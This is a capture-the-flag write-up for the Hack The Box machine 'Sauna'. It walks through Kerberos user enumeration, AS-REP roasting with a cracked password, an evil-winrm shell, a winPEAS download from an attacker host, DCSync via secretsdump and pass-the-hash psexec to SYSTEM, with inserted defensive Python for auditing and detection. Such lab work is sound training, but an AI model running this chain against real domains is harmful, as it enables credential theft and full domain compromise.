Sauna
Sauna Windows · Easy - Adventure mode
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -sSVC sauna.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-23 18:57 CET
Nmap scan report for sauna.htb (10.129.95.180)
Host is up (0.043s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-24 01:00:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2026-01-24T01:01:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.00 seconds
🔭 Reconnaissance:
Team
=========
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
The Team page on the website reveals some possible users.
fsmith
hbear
skerb
scoins
btaylor
sdriver
ferguss
hugobear
stevenk
ShaunCoins
BowieTaylor
SophieDriver
drivershopie
admin
Based on those names I prepare a username file with the first initial plus the surname, the first name plus the surname initial, and other likely combinations. Many companies create usernames from the first initial of the name followed by the surname.
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ # Using Nmap
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.LOCAL',userdb=team.txt sauna.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-23 19:43 CET
Nmap scan report for sauna.htb (10.129.95.180)
Host is up (0.042s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|_ fsmith@EGOTISTICAL-BANK.LOCAL
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
Using the Nmap script krb5-enum-users we discover that the user fsmith exists in the domain.
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ impacket-GetNPUsers -request 'EGOTISTICAL-BANK.LOCAL/fsmith' -dc-ip sauna.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:38df19cc5f193f486b0ef8e9bfe43d5b$66f7fb7443e352a50f86bafbc2875a8382d9ff595f46973edd6cd901255709de8744639fedaf24b1a263071b8ff54b4f545cb8009c858af03542b6e13805b1c266e4945912cdc1deb5d71f79a4f38669a8145d21d8c4da1a9f315c12ac618bd75751a2d4a7c5fdcfe6ec47037597d3ebe4b41ac93f81f8a041b229cb4d686a17c69c426d90701a1c613c716c77ab881181e1f2d38bc7cbdac549b5bb0dbfea3178c85feecb8caf28d5e94a213531c970533dbfa6e8cdbda41f36ca55c6454819948dde67831acf1fa0b2dc5d9630a085ac098ad9aae9efc27279d7b2a7948e332c971d64754714c691c1a7708377bee777dc7a7648e3381596bc913db78e8412
impacket-GetNPUsers is used to exploit a weakness in Active Directory's Kerberos configuration known as AS-REP Roasting. What exactly does it do? It obtains crackable password material: it requests a Kerberos TGT (Ticket Granting Ticket) for users that do not have pre-authentication enabled (an insecure setting, because the KDC hands out the ticket without first proving the requester knows the password). It then extracts the hash from the reply: if the server responds with a TGT, part of the AS-REP is encrypted with a key derived from the user's password, and that encrypted portion is written out in a format hashcat can attack offline.
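The same weakness can be audited from the defender's side. The following Python is added here as an example (it is not part of the original writeup): it parses the `$krb5asrep$` line format that GetNPUsers emits and flags enabled accounts whose userAccountControl has the DONT_REQ_PREAUTH bit set; the account records and the hash line are constructed sample data.

```python
"""Audit helpers for the AS-REP Roasting weakness described above.

Added example, not part of the original writeup; account records and the
hash line below are constructed sample data, not real directory output.
"""
import re

# userAccountControl bit shown in AD as "Do not require Kerberos preauthentication".
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# Line format emitted by impacket-GetNPUsers (consumed by hashcat mode 18200):
#   $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex encrypted data>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
               23: "rc4-hmac"}

def parse_asrep(line):
    """Split a captured AS-REP line into its fields. The encrypted part is keyed
    on the user's password, which is why it can be attacked offline; etype 23
    (RC4) is cheaper to crack than the AES types."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    etype = int(m.group("etype"))
    return {"user": m.group("user"), "realm": m.group("realm"), "etype": etype,
            "etype_name": ETYPE_NAMES.get(etype, "unknown"),
            "edata_bytes": len(m.group("edata")) // 2}

def roastable_accounts(records):
    """Return enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set.
    `records` are (sAMAccountName, userAccountControl) pairs as from an LDAP export;
    these are the accounts to fix (clear the flag or enforce a strong password)."""
    return sorted(name for name, uac in records
                  if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE)

# Constructed sample data: the flag values are real UAC bits, the names are from
# the writeup's candidate list plus one invented disabled account.
SAMPLE_ACCOUNTS = [
    ("fsmith", 0x400200),      # NORMAL_ACCOUNT | DONT_REQ_PREAUTH -> roastable
    ("hbear", 0x200),          # NORMAL_ACCOUNT only
    ("svc_loanmgr", 0x10200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("olduser", 0x400202),     # pre-auth disabled but ACCOUNTDISABLE set
]
SAMPLE_ASREP = ("$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:"
                "00112233445566778899aabbccddeeff$" + "deadbeef" * 4)
```

In a real audit, feed `roastable_accounts` the result of an LDAP query for `userAccountControl` on every user object; the disabled account is skipped because it cannot request a TGT anyway.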
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:38df19cc5f193f486b0ef8e9bfe43d5b$[...]:Thestrokes23
With hashcat we crack the AS-REP hash and recover the password: fsmith:Thestrokes23
👽 Actions:
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ evil-winrm -u fsmith -p Thestrokes23 -i sauna.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/var/lib/gems/3.3.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith> type Desktop/user.txt
9ef3285b0f2e5e22c3b57b089ed7cf6f
*Evil-WinRM* PS C:\Users\FSmith> dir c:\users
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2026 7:03 PM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr
Invoke-WebRequest -Uri "http://10.10.15.67:8000/winPEASx64.exe" -OutFile "C:\Users\FSmith\winPEASx64.exe"
Winpeas64.exe
╔══════════╣ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
With Evil-WinRM we grab the first (user) flag, download winPEASx64.exe, and it finds a second credential for us in the Winlogon AutoLogon registry values: svc_loanmanager:Moneymakestheworldgoround!. Note that DefaultUserName says svc_loanmanager, while the account present in C:\users is svc_loanmgr; that password is used with the svc_loanmgr account in the next step.
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.96.197 -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up...
The next step is to use impacket-secretsdump with this user, which holds directory replication rights (the DRSUAPI method in the output is the DCSync path, which only works for principals allowed to replicate directory changes), to obtain the Administrator account's hashes without touching NTDS.dit on disk.
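On the detection side, the replication request secretsdump makes is visible as Windows Security event 4662 with a replication control-access right. The following Python is added here as an example (not part of the original writeup): it flags 4662 events in which a principal other than a domain controller computer account exercised one of those rights; the event records are constructed sample data and SAUNA$ is assumed to be the DC's computer account from the scan's host name.

```python
"""Flag DCSync-style replication requests like the secretsdump DRSUAPI step above.

Added example, not part of the original writeup; the event records are
constructed sample data shaped like Windows Security event 4662 fields.
"""
# Control-access-right GUIDs that the DRSUAPI replication path requires.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

def dcsync_alerts(events, dc_accounts):
    """Return sorted (account, right) pairs for 4662 events in which a principal
    other than a domain controller computer account exercised a replication right.
    Genuine replication is DC-to-DC, so any other subject is worth an alert."""
    alerts = set()
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dc_accounts:
            continue
        # Properties carries the access type followed by one {GUID} per line.
        props = {tok.strip("{}").lower() for tok in ev.get("Properties", "").split()}
        for guid, right in REPLICATION_RIGHTS.items():
            if guid in props:
                alerts.add((subject, right))
    return sorted(alerts)

# Constructed sample events (not real log output). SAUNA is the DC host name
# from the scan, so SAUNA$ is assumed to be its computer account.
DC_ACCOUNTS = {"SAUNA$"}
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "fsmith",     # unrelated property read
     "Properties": "Read Property {aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
    {"EventID": 4624, "SubjectUserName": "fsmith", "Properties": ""},
]
```

The underlying fix is to review who holds DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain naming context and remove the rights from accounts that are not domain controllers.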
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ impacket-psexec 'EGOTISTICAL-BANK.LOCAL/administrator@sauna.htb' -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on sauna.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YvUOCGNe.exe
[*] Opening SVCManager on sauna.htb.....
[*] Creating service bGaD on sauna.htb.....
[*] Starting service bGaD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
c:\Users\Administrator\Desktop> type root.txt
60ecc7a5eec92eafb8a35714cca47081
Finally, using impacket-psexec with the hashes obtained (pass-the-hash, no cleartext Administrator password needed) we get a SYSTEM shell and can read the root.txt flag.
https://labs.hackthebox.com/achievement/machine/2336390/229